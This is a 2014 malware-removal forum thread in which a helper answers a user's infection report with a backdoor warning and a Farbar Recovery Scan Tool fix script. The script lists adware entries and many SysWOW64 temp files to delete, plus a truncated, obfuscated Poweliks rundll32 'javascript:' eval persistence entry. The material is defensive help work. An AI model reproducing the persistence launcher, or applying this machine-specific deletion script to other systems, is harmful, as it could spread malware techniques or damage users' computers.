
I may be infected with Malware, can you help? [Closed]


  • This topic is locked
21 replies to this topic

#1 suefiza


Posted 30 November 2014 - 05:30 PM

I fear I've come down with a case of Malware.  Can you please review and advise?  I have been experiencing periods of extreme slowness on my PC while trying to do very basic actions.  Norton360 has been alerting on high CPU usage of the following:  COM surrogate, wextract.exe, dplaysvr. Looking at Task Manager and Resource Monitor I've found high CPU usage of svchost and multiple sessions of dllhost.  I am also getting alerts from Norton of threats that have been found, and Norton has been recommending frequent restarts.  I am also getting frequent messages stating:  Powershell has stopped working.  I was not knowingly running any scripts using Powershell. 

 

At this moment, with nothing but Notepad open as I type this up ahead of time (before posting) and Task Manager running, CPU is jumping up and down between 50% and 100%. I know that there are a lot of processes running in the background but this seems extreme to me. After disconnecting my internet, the CPU usage dropped to between 5% and 15% within around 10 seconds. I have run aswMBR and FRST64 and have logs ready to upload. Thank you!


Edited by suefiza, 30 November 2014 - 05:32 PM.


#2 LiquidTension


Posted 30 November 2014 - 09:02 PM

Hello suefiza, welcome to WhatTheTech's Malware Removal forum!
 
My username is LiquidTension, but you can call me Adam. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that.  :)
 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Please ensure you read through my instructions thoroughly, and carry out each step in the order specified.
  • Please do not post logs using the CODEQUOTE or ATTACHMENT format. Logs should be posted directly in plain text. If you receive an error whilst posting, please break the log in half and use multiple posts.
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in ascertaining the current situation and providing the best set of instructions for you.
  • Please backup important files before proceeding with my instructions. Malware removal can be unpredictable.  
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before proceeding.
  • Topics are locked if no response is made after 4 days. Please inform me if you require additional time to complete my instructions.
  • Ensure you are following this topic. Click the follow button at the top of the page.
     

======================================================
 
Due to the nature of the infection present, I must issue the following warning. Please have a read and let me know what you think. 
 

BACKDOOR WARNING
 
------------------------------
 
One or more of the identified infections is known to use a backdoor, that allows attackers to remotely control your computer, download/execute files and steal critical system, financial and personal information.
 
If your computer was used for online banking, has credit card information or other sensitive data, using a non-infected computer/device you should immediately change all account information (including those used for banking, Email, eBay, Paypal, online forums, etc).
 
Banking and credit card institutions should be notified of the possible security breach. Please read the following article for more information: How Do I Handle Possible Identity Theft, Internet Fraud and CC Fraud?
 
Whilst the identified infection(s) can be removed, there is no way to guarantee the trustworthiness of your computer unless you reformat your Hard Drive and reinstall your Operating System. This is due to the nature of the infection, which allows a remote attacker to make any number of modifications. Many experts in the security community believe that once infected with this type of malware, the best course of action is to reformat/reinstall. Please read the following articles for more information.

You now have the choice between cleaning the infection(s) present or reformatting your computer. Ultimately, the decision is personal, and depends on what you're most comfortable with. Have a read of the articles linked, then let me know how you wish to proceed, and if you have any questions.

 
If you wish to clean the machine now, please work your way through the steps below. 
 
STEP 1
Farbar Recovery Scan Tool (FRST) Script

  • Press the Windows Key + R on your keyboard at the same time. Type Notepad and click OK.
  • Copy the entire contents of the codebox below and paste into the Notepad document.
    start
    HKLM\...\Run: [] => [X]
    HKLM-x32\...\Run: [] => [X]
    HKU\S-1-5-21-708974729-55146766-922195683-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
    URLSearchHook: HKU\S-1-5-21-708974729-55146766-922195683-1000 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
    SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> DefaultScope {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmoods.com/results.php?f=4&a=axl&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {9C687E47-1977-4703-A481-C8CABB96E47A} URL = http://start.funmoods.com/results.php?f=4&a=axl&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-708974729-55146766-922195683-1000 -> {A531D99C-5A22-449b-83DA-872725C6D0ED} URL = http://search.alot.com/web?q={searchTerms}&pr=prov&client_id=85E670F001CD139105B8FB4C&install_time=2012-04-06T01:06:33Z&src_id=30504&camp_id=3906&tb_version=1.1.3001.0(B)
    BHO-x32: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
    Toolbar: HKLM-x32 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn\yt.dll (Yahoo! Inc.)
    FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd} [Not Found]
    CHR HomePage: Default -> hxxp://start.funmoods.com/?f=1&a=axl
    CHR HKLM-x32\...\Chrome\Extension: [fdloijijlkoblmigdofommgnheckmaki] - C:\Program Files (x86)\Funmoods\funmoods\1.5.11.16\funmoodsOEM.crx [2014-10-04]
    C:\Program Files (x86)\Funmoods
    2014-11-30 15:17 - 2014-11-30 15:17 - 00000000 ____D () C:\Users\Owner\AppData\Local\{E1942AFD-BAA2-4C6F-8B54-71A4F500BF59}
    2014-11-29 11:26 - 2014-11-29 11:26 - 01176168 ____T () C:\windows\SysWOW64\00023117.tmp
    2014-11-29 11:26 - 2014-11-29 11:26 - 01176168 ____T () C:\windows\SysWOW64\00015471.tmp
    2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00031111.tmp
    2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00028728.tmp
    2014-11-29 11:25 - 2014-11-29 11:25 - 01176168 ____T () C:\windows\SysWOW64\00026393.tmp
    2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00031371.tmp
    2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00020726.tmp
    2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00020389.tmp
    2014-11-29 11:24 - 2014-11-29 11:24 - 01176168 ____T () C:\windows\SysWOW64\00017818.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00031411.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00029171.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00025329.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00017058.tmp
    2014-11-29 11:23 - 2014-11-29 11:23 - 01176168 ____T () C:\windows\SysWOW64\00014895.tmp
    2014-11-29 11:22 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00011232.tmp
    2014-11-29 11:22 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00002098.tmp
    2014-11-29 11:21 - 2014-11-29 11:22 - 01176168 ____T () C:\windows\SysWOW64\00032327.tmp
    2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00032523.tmp
    2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00014946.tmp
    2014-11-29 11:21 - 2014-11-29 11:21 - 01176168 ____T () C:\windows\SysWOW64\00010308.tmp
    2014-11-29 11:20 - 2014-11-29 11:20 - 01176168 ____T () C:\windows\SysWOW64\00003015.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 40034920 ____T () C:\windows\SysWOW64\00002113.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00023823.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00023071.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00014825.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00010889.tmp
    2014-11-29 11:19 - 2014-11-29 11:19 - 01176168 ____T () C:\windows\SysWOW64\00010756.tmp
    2014-11-28 19:09 - 2014-11-28 19:09 - 01176168 ____T () C:\windows\SysWOW64\00018636.tmp
    2014-11-28 19:09 - 2014-11-28 19:09 - 01176168 ____T () C:\windows\SysWOW64\00009161.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00030454.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00030447.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00028745.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00028716.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00026816.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00026777.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00024578.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00023986.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00023973.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00016512.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00015573.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00015155.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00005021.tmp
    2014-11-28 19:08 - 2014-11-28 19:08 - 01176168 ____T () C:\windows\SysWOW64\00002866.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00031673.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00030319.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00024078.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00023996.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00010089.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00009930.tmp
    2014-11-28 19:07 - 2014-11-28 19:07 - 01176168 ____T () C:\windows\SysWOW64\00002306.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00031115.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00029658.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00025608.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00024626.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00023762.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00022929.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00021311.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00016541.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00016118.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00014977.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00014643.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00012646.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00010697.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00002161.tmp
    2014-11-28 19:06 - 2014-11-28 19:06 - 01176168 ____T () C:\windows\SysWOW64\00002082.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00032439.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00031960.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00031865.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00026308.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00025184.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00023329.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00016944.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00011840.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00004966.tmp
    2014-11-28 19:05 - 2014-11-28 19:05 - 01176168 ____T () C:\windows\SysWOW64\00002237.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 40034920 ____T () C:\windows\SysWOW64\00031322.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 40034920 ____T () C:\windows\SysWOW64\00023811.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00031705.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00030925.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00030333.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00029577.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00029464.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00028973.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00026798.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025951.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025547.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00025444.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024393.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024370.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00024084.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00023805.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00023491.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00020799.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00017673.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00017555.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00016571.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015890.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015350.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015141.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00015006.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00014883.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00014818.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00012859.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00012623.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010496.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010309.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00010053.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00009413.tmp
    2014-11-28 19:04 - 2014-11-28 19:04 - 01176168 ____T () C:\windows\SysWOW64\00003548.tmp
    2014-11-28 19:03 - 2014-11-28 19:03 - 40034920 ____T () C:\windows\SysWOW64\00015984.tmp
    2014-11-28 18:51 - 2014-11-28 18:51 - 40034920 ____T () C:\windows\SysWOW64\00026299.tmp
    2014-11-28 18:51 - 2014-11-28 18:51 - 40034920 ____T () C:\windows\SysWOW64\00017035.tmp
    2014-11-28 18:51 - 2014-11-28 18:51 - 01176168 ____T () C:\windows\SysWOW64\00011277.tmp
    2014-11-28 18:51 - 2014-11-28 18:51 - 01176168 ____T () C:\windows\SysWOW64\00009894.tmp
    2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00025667.tmp
    2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00017619.tmp
    2014-11-28 18:50 - 2014-11-28 18:50 - 40034920 ____T () C:\windows\SysWOW64\00015674.tmp
    2014-11-28 18:49 - 2014-11-28 18:49 - 40034920 ____T () C:\windows\SysWOW64\00009558.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 40034920 ____T () C:\windows\SysWOW64\00029666.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 40034920 ____T () C:\windows\SysWOW64\00020219.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00032474.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00032274.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00031833.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00031762.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00030039.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00028825.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020776.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020697.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00020695.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00017098.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016156.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016039.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00016021.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00015665.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00015633.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00011924.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00008712.tmp
    2014-11-28 18:17 - 2014-11-28 18:17 - 01176168 ____T () C:\windows\SysWOW64\00003225.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00030809.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00030106.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00024466.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00023278.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00015279.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00009040.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00008942.tmp
    2014-11-28 17:44 - 2014-11-28 17:44 - 01176168 ____T () C:\windows\SysWOW64\00001842.tmp
    2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00030623.tmp
    2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00018317.tmp
    2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00012316.tmp
    2014-11-28 17:43 - 2014-11-28 17:43 - 01176168 ____T () C:\windows\SysWOW64\00003035.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00032391.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00029358.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00025850.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00024464.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00023281.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00021293.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00017421.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00015724.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00014771.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00012382.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00012296.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011942.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011811.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00011478.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00009741.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00008723.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00002995.tmp
    2014-11-28 17:42 - 2014-11-28 17:42 - 01176168 ____T () C:\windows\SysWOW64\00001869.tmp
    2014-11-28 17:41 - 2014-11-28 17:41 - 40034920 ____T () C:\windows\SysWOW64\00026500.tmp
    2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00018266.tmp
    2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00016034.tmp
    2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00015634.tmp
    2014-11-28 17:40 - 2014-11-28 17:40 - 01176168 ____T () C:\windows\SysWOW64\00002285.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00030578.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00030229.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00023977.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00020742.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00020235.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00010628.tmp
    2014-11-28 17:39 - 2014-11-28 17:39 - 01176168 ____T () C:\windows\SysWOW64\00009513.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00030861.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00026229.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00024618.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00015427.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011764.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011583.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00011416.tmp
    2014-11-28 17:38 - 2014-11-28 17:38 - 01176168 ____T () C:\windows\SysWOW64\00009629.tmp
    2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00024044.tmp
    2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00010878.tmp
    2014-11-28 17:37 - 2014-11-28 17:37 - 40034920 ____T () C:\windows\SysWOW64\00004843.tmp
    2014-11-21 19:24 - 2014-11-21 19:24 - 00000000 ____D () C:\Users\Owner\AppData\Roaming\UpdaterEX
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00032443.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00029794.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00023882.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00020540.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00016943.tmp
    2014-11-10 16:32 - 2014-11-10 16:32 - 01176168 ____T () C:\windows\SysWOW64\00008696.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00032387.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030762.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030524.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00030400.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029911.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029532.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00029136.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00026392.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00025130.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00024350.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00020723.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00018485.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00018399.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00016036.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00004936.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00003093.tmp
    2014-11-10 16:31 - 2014-11-10 16:31 - 01176168 ____T () C:\windows\SysWOW64\00002479.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00032336.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00026404.tmp
    2014-11-10 16:30 - 2014-11-10 16:30 - 01176168 ____T () C:\windows\SysWOW64\00017573.tmp
